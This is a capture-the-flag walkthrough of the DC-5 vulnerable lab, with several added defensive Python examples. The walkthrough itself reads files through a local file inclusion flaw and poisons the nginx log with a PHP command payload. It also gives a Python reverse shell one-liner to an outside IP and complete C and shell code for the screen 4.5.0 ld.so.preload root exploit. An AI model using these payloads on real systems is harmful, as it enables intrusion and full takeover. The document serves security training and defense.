DC-5 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing.
The plan was for DC-5 to kick it up a notch, so this might not be great for beginners, but should be ok for people with intermediate or better experience. Time will tell (as will feedback).
As far as I am aware, there is only one exploitable entry point to get in (there is no SSH either). This particular entry point may be quite hard to identify, but it is there. You need to look for something a little out of the ordinary (something that changes with a refresh of a page). This will hopefully provide some kind of idea as to what the vulnerability might involve.
And just for the record, there is no phpmailer exploit involved. :-)
The ultimate goal of this challenge is to get root and to read the one and only flag.
Linux skills and familiarity with the Linux command line are a must, as is some experience with basic penetration testing tools.
We always start with an nmap scan, this time across all ports:
nmap -sC -sV -p- -oA nmap <Target-IP>
# Nmap 7.91 scan initiated Thu May 27 05:45:51 2021 as: nmap -sC -p- -sV -oA nmap 172.16.139.185
Nmap scan report for DC-5 (172.16.139.185)
Host is up (0.0015s latency).
Not shown: 65532 closed ports
PORT STATE SERVICE VERSION
80/tcp open http nginx 1.6.2
|_http-server-header: nginx/1.6.2
|_http-title: Welcome
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100024 1 47835/udp status
| 100024 1 51334/udp6 status
| 100024 1 52216/tcp status
|_ 100024 1 54172/tcp6 status
52216/tcp open status 1 (RPC #100024)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu May 27 05:46:08 2021 -- 1 IP address (1 host up) scanned in 16.99 seconds
Scanning all ports gives us 3 open ports, but since the lab focuses on port 80 (HTTP), let's hit that first and start enumerating.
We are on the webpage. Let's look around for something vulnerable. After spending some time checking, I landed on the contact page.
Let's try to contact them and also check for SQL injection. Nope, not the way in. So let's check the URL we have after sending them a mail:
http://172.16.139.186/thankyou.php?firstname=&lastname=&country=australia&subject=
Looks like LFI, right? Sounds interesting.
Not going to lie, finding the right parameter name is a real pain. But we learn something every day: it was something simple, my mind just was not set there at all. So let's continue.
http://172.16.139.186/thankyou.php?file=/etc/passwd
Here the right parameter is file. Guessing it took me a long time.
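What makes this possible is the server using the file parameter as a path without any restriction. As an added example that is not from the box or this write-up, here is that unsafe pattern next to a hardened version, written in Python so it runs stand-alone (the source of thankyou.php is not shown, so the template directory, the page names and the function names are assumptions):

```python
import os
import re
import tempfile

# Constructed sandbox for the demo: a template directory with two pages, and a
# "secret" file outside it standing in for /etc/passwd.
TEMPLATE_DIR = os.path.realpath(tempfile.mkdtemp(prefix="templates-"))
for _name in ("thankyou", "contact"):
    with open(os.path.join(TEMPLATE_DIR, _name + ".html"), "w") as _fh:
        _fh.write(f"<h1>{_name}</h1>")
SECRET_PATH = os.path.join(tempfile.mkdtemp(prefix="outside-"), "passwd")
with open(SECRET_PATH, "w") as _fh:
    _fh.write("root:x:0:0:root:/root:/bin/bash\n")


def include_unsafe(param: str) -> str:
    """The LFI pattern: the request parameter is used as a path unchanged, so
    file=/etc/passwd (or a log file) is read and returned verbatim."""
    with open(param) as fh:
        return fh.read()


ALLOWED_PAGES = {"thankyou", "contact"}        # assumed: the pages the app really needs
SAFE_NAME = re.compile(r"^[a-z][a-z0-9_-]{0,31}$")


def include_safe(param: str) -> str:
    """Hardened: the parameter is a page *name*, never a path.
    Layer 1: syntactic check (no slashes, dots or encoding tricks survive).
    Layer 2: allow-list of known pages.
    Layer 3: resolve and confirm the final path is still inside TEMPLATE_DIR."""
    if not SAFE_NAME.match(param) or param not in ALLOWED_PAGES:
        raise ValueError(f"page not allowed: {param!r}")
    path = os.path.realpath(os.path.join(TEMPLATE_DIR, param + ".html"))
    if os.path.commonpath([path, TEMPLATE_DIR]) != TEMPLATE_DIR:
        raise ValueError("resolved path escapes the template directory")
    with open(path) as fh:
        return fh.read()


def is_rejected(param: str) -> bool:
    """Convenience: True when include_safe refuses the parameter."""
    try:
        include_safe(param)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    print("unsafe:", include_unsafe(SECRET_PATH).strip())   # leaks the secret
    print("safe:  ", include_safe("thankyou"))
    for bad in (SECRET_PATH, "../../etc/passwd", "/var/log/nginx/error.log"):
        print("rejected" if is_rejected(bad) else "ACCEPTED", bad)
```

The allow-list alone would stop the reads shown in this write-up; the name check and the realpath containment check are there so that the protection survives the day someone widens the allow-list or starts building the name from several inputs.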
LFI To SHELL Through Log Poisoning
We know our web server is Nginx, so poisoning its log is easy: a little research on Google gives us the log path.
Let's intercept our request with Burp and send it to the Repeater tab, with the PHP payload <?php system($_GET['rev']) ?> in the request so that it gets written to the log.
Let's confirm that we poisoned it: http://172.16.139.186/thankyou.php?file=/var/log/nginx/error.log
Boom, we definitely did. Now let's run a command from Burp: /var/log/nginx/error.log&rev=ls
That is the path I was talking about, with the little twist we added to poison the web server.
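From the defender's side, the whole chain above leaves traces in the web logs: a file= value that is an absolute or traversal path, a request that references the server's own log directory, and a PHP tag arriving in a logged field such as the User-Agent. Added example (not from the write-up): a small Python detector run over constructed nginx combined-format lines that mirror the requests above. The sample lines are made up for this demo, and the detector also catches URL-encoded traversal, which the write-up does not use:

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed nginx 'combined'-format lines (not a real capture) that mirror the
# write-up's requests: the normal form submission, the /etc/passwd read, the
# poisoning request carrying a PHP tag in the User-Agent, the inclusion of the
# error log with a rev= command, a URL-encoded traversal, and a benign page.
SAMPLE_LOG = """\
172.16.139.1 - - [27/May/2021:05:50:01 +0000] "GET /thankyou.php?firstname=&lastname=&country=australia&subject= HTTP/1.1" 200 612 "-" "Mozilla/5.0"
172.16.139.1 - - [27/May/2021:05:52:13 +0000] "GET /thankyou.php?file=/etc/passwd HTTP/1.1" 200 1903 "-" "Mozilla/5.0"
172.16.139.1 - - [27/May/2021:05:53:40 +0000] "GET /does-not-exist HTTP/1.1" 404 169 "-" "<?php system($_GET['rev']) ?>"
172.16.139.1 - - [27/May/2021:05:54:02 +0000] "GET /thankyou.php?file=/var/log/nginx/error.log&rev=ls HTTP/1.1" 200 8812 "-" "Mozilla/5.0"
172.16.139.1 - - [27/May/2021:05:54:30 +0000] "GET /thankyou.php?file=..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1" 200 1903 "-" "Mozilla/5.0"
172.16.139.1 - - [27/May/2021:05:55:00 +0000] "GET /contact.php HTTP/1.1" 200 1402 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]*)" '
    r'(?P<status>\d{3}) (?P<bytes>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
PHP_TAG = re.compile(r"<\?(?:php\b|=)", re.IGNORECASE)
LOG_DIRS = ("/var/log/", "/proc/self/")   # files an LFI needs to turn into code execution


def classify(line: str):
    """Return the list of reasons a single log line looks like LFI / log poisoning
    (empty list = nothing suspicious, None = line did not parse)."""
    m = LOG_RE.match(line.rstrip("\n"))
    if not m:
        return None
    reasons = []
    # parse_qs percent-decodes values, so ..%2F..%2F is seen as ../../
    query = parse_qs(urlsplit(m["target"]).query, keep_blank_values=True)
    for name, values in query.items():
        for value in values:
            if value.startswith("/") or "../" in value or "..\\" in value:
                reasons.append(f"path-like value in {name}")
            if any(d in value for d in LOG_DIRS):
                reasons.append(f"log file referenced in {name}")
    # the PHP tag can arrive in any field the server writes to its logs
    for field in ("target", "referer", "ua"):
        if PHP_TAG.search(unquote(m[field])):
            reasons.append(f"php tag in {field}")
    return reasons


def scan_log(text: str):
    """Map line number -> reasons for every suspicious line in a log."""
    hits = {}
    for lineno, line in enumerate(text.splitlines(), 1):
        reasons = classify(line)
        if reasons:
            hits[lineno] = reasons
    return hits


if __name__ == "__main__":
    for lineno, reasons in scan_log(SAMPLE_LOG).items():
        print(f"line {lineno}: {', '.join(reasons)}")
```

Run against the sample it flags lines 2 to 5 and leaves the form submission and the contact page alone. The same rules drop straight into a SIEM query; the point of checking the Referer and User-Agent as well as the URL is that the poisoning request itself can look like an ordinary 404.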
Getting Reverse Shell
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.10.10",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
NOTE: edit the IP and port and start an ncat listener first, then run it to get our shell.
Shell below:
Spawning a TTY shell makes the shell stable and also so cool to use (I know, I love using the word cool, lol).
python -c 'import pty; pty.spawn("/bin/bash")'
And I think we are good to go.
Checking all the folders I found nothing, so I decided to look for SUID binaries with find / -perm -u=s -type f 2>/dev/null
to list out the SUID files.
It seems we have /bin/screen-4.5.0.
Let's check for an exploit.
Nice.
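A non-stock setuid binary like /bin/screen-4.5.0 is exactly what a periodic SUID audit should catch. Added example (not from the write-up): a Python equivalent of the find command above that compares setuid files against a known-good baseline. The baseline set is an assumption for the demo; in practice it would be generated from a clean image of the same distribution:

```python
import os
import stat

# Assumed baseline for the demo: setuid binaries a stock install of the target's
# distribution is expected to ship. In practice generate this from a clean image
# with the same find command and keep it under version control.
BASELINE = {
    "/bin/mount", "/bin/ping", "/bin/ping6", "/bin/su", "/bin/umount",
    "/usr/bin/chfn", "/usr/bin/chsh", "/usr/bin/gpasswd", "/usr/bin/newgrp",
    "/usr/bin/passwd", "/usr/bin/sudo",
}
SKIP_DIRS = ("/proc", "/sys", "/dev", "/run")   # pseudo filesystems, not worth walking


def is_setuid(mode: int) -> bool:
    """Same selection as `find / -perm -u=s -type f`: a regular file with the
    setuid bit. Symlinks are excluded because find -type f does not follow them."""
    return stat.S_ISREG(mode) and bool(mode & stat.S_ISUID)


def unexpected_setuid(entries, baseline=BASELINE):
    """entries: iterable of (path, st_mode). Returns the sorted setuid paths
    that are not in the baseline, i.e. the ones that need a human look."""
    return sorted(path for path, mode in entries
                  if is_setuid(mode) and path not in baseline)


def walk_modes(root="/"):
    """Yield (path, st_mode) for every entry under root, silently skipping
    what we cannot read (the 2>/dev/null part of the find command)."""
    for dirpath, dirnames, filenames in os.walk(root, onerror=lambda err: None):
        dirnames[:] = [d for d in dirnames if os.path.join(dirpath, d) not in SKIP_DIRS]
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                yield path, os.lstat(path).st_mode
            except OSError:
                continue


if __name__ == "__main__":
    for path in unexpected_setuid(walk_modes("/")):
        print("unexpected setuid binary:", path)
```

On the DC-5 box this reports /bin/screen-4.5.0 and nothing else, which is the signal an administrator wants: a setuid file with a version number baked into its name is not something package management put there.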
Privilege Escalation
What we have to do now is build the exploit. We already have it, but it needs some fixing before it will run.
Now let's do the right thing.
#include <stdio.h>
#include <sys/types.h>
#include <sys/stat.h>   /* chmod */
#include <unistd.h>     /* chown, unlink */

/* Runs automatically when the library is loaded through /etc/ld.so.preload
   into a root-owned process (here: setuid screen). */
__attribute__ ((__constructor__))
void dropshell(void){
    chown("/tmp/rootshell", 0, 0);      /* make the helper root-owned */
    chmod("/tmp/rootshell", 04755);     /* and setuid root */
    unlink("/etc/ld.so.preload");       /* remove the preload file again */
    printf("[+] done!\n");
}
Let's save it in a file named exploit.c
#include <stdio.h>
#include <unistd.h>     /* setuid family, execvp */

int main(void){
    setuid(0);
    setgid(0);
    seteuid(0);
    setegid(0);
    /* execvp(file, argv) takes two arguments; argv must be NULL-terminated */
    char *const argv[] = {"/bin/sh", NULL};
    execvp("/bin/sh", argv);
    return 1;   /* only reached if exec fails */
}
Let's save it in a file named rootshell.c
#!/bin/bash
echo "[+] Now we create our /etc/ld.so.preload file..."
cd /etc
umask 000 # because
screen -D -m -L ld.so.preload echo -ne "\x0a/tmp/libhax.so" # newline needed
echo "[+] Triggering..."
screen -ls # screen itself is setuid, so...
/tmp/rootshell
Let's save it in a file named root.sh
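The script's whole trick is getting a line into /etc/ld.so.preload that points at a library in /tmp, and that is also what a defender can watch for: on a healthy host the file usually does not exist at all, and any entry outside the system library directories is suspect. Added example (not from the write-up): a Python check of that file's ownership, permissions and contents, exercised against the exact content the script writes. The trusted directory list is an assumption:

```python
import os
import stat

# Assumption for the demo: directories a legitimately preloaded library may live in.
TRUSTED_LIB_DIRS = ("/lib", "/lib64", "/usr/lib", "/usr/lib64", "/usr/local/lib")


def audit_preload_content(content: str):
    """Check the text of /etc/ld.so.preload. The loader reads one or more
    library paths per line, separated by whitespace, so the leading blank line
    the script's echo -ne "\\x0a..." produces hides nothing.
    Returns a list of (line, entry, why)."""
    findings = []
    for lineno, raw in enumerate(content.splitlines(), 1):
        for entry in raw.split():
            if not entry.startswith("/"):
                findings.append((lineno, entry, "relative path"))
            elif not any(entry.startswith(d + "/") for d in TRUSTED_LIB_DIRS):
                findings.append((lineno, entry, "outside trusted library dirs"))
    return findings


def audit_preload_file(path="/etc/ld.so.preload"):
    """Full check of the file on disk: absence is the normal state; presence with
    non-root ownership, loose permissions or an untrusted entry is a finding."""
    if not os.path.lexists(path):
        return []
    st = os.lstat(path)
    findings = []
    if stat.S_ISLNK(st.st_mode):
        findings.append((0, path, "is a symlink"))
    if st.st_uid != 0:
        findings.append((0, path, "not owned by root"))
    if st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
        findings.append((0, path, "writable by group or others"))
    with open(path, encoding="utf-8", errors="replace") as fh:
        findings.extend(audit_preload_content(fh.read()))
    return findings


if __name__ == "__main__":
    for lineno, entry, why in audit_preload_file():
        print(f"/etc/ld.so.preload line {lineno}: {entry}: {why}")
```

Because the exploit library deletes /etc/ld.so.preload as soon as it has done its work, a check that only runs once a day can miss it; the durable artefacts are the file's creation (a file-integrity or inotify watch on /etc) and the new setuid binary in /tmp that the previous audit would report.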
Now we need to compile them.
gcc -fPIC -shared -ldl -o libhax.so exploit.c
gcc -o rootshell rootshell.c
Now let's upload them to the target. The script expects libhax.so and rootshell in /tmp, so put them there.
With all the files on the target, give root.sh execute permission with chmod +x root.sh
and now let's run it.
Rooooooooooooooooooot! Now let's get the flag.txt.
Box rooted and we are done.
Greetings from Muzec